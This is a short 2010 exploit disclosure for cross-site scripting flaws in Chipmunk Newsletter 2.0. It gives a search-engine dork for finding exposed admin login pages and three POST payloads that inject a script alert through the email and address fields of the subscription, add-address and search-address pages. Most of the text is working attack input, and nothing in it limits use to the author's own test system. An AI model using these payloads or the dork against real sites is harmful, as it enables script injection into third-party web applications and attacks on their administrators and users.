dadf# Title: Chipmunk Newsletter XSS Vulnerabilities
# Date: 01-19-2010
# Author: b0telh0
# Software Link: http://www.chipmunk-scripts.com/newsletter/newsletter.zip
# Version: 2.0
# Tested on: Windows 7


Another XSS on Chipmunk Newsletter...
Thanks to mr_me who found the first flaw on it!


::[ inurl:admin/login.php "Registering Admin" ]::



1 - http://localhost/sub.php

POSTDATA:
email=<script>alert('xss')</script>&choice=sub&lists=1&submit=submit



2 - http://localhost/admin/addaddress.php

POSTDATA:
email=<script>alert('xss')</script>&lists=1&submit=submit


then we can check it...



http://localhost/admin/searchaddress.php

POSTDATA:
theaddress=<script>alert('xss')</script>&submit=submit